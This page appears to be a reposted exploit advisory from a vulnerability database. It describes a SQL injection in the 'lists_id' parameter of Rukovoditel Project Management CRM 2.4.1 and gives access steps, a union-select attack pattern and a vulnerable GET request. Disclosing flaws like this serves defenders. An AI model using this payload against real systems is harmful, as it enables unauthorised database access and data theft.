Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection

2019.01.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection # Dork: N/A # Date: 27-01-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://sourceforge.net/projects/rukovoditel/ # Version: 2.4.1 # Category: Webapps # Tested on: Wampp @Win # CVE: N/A # Software Description : Rukovoditel is a free web-based open-source project management application. A far cry from traditional applications, Rukovoditel gives users a broader and extensive approach to project management. Its customization options allow users to create additional entities, modify and specify the relationship between them, and generate the necessary reports. # Vulnerabilities # For the SQL injection to be applied, the user must log in. then from the Application structure screen to the global list tab. add new value button to create a new list. You can apply sql injection through the generated list. The pictures of the weaknesses are below. https://i.hizliresim.com/nQJZm5.jpg https://i.hizliresim.com/WqGmEQ.jpg # POC - SQLi # Parameters : lists_id=1 (string) # Attack Pattern : -1'+union+select+1,2--+ # GET Request : http://localhost/[PATH]/index.php?module=global_lists/choices&lists_id=1'[SQL]


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top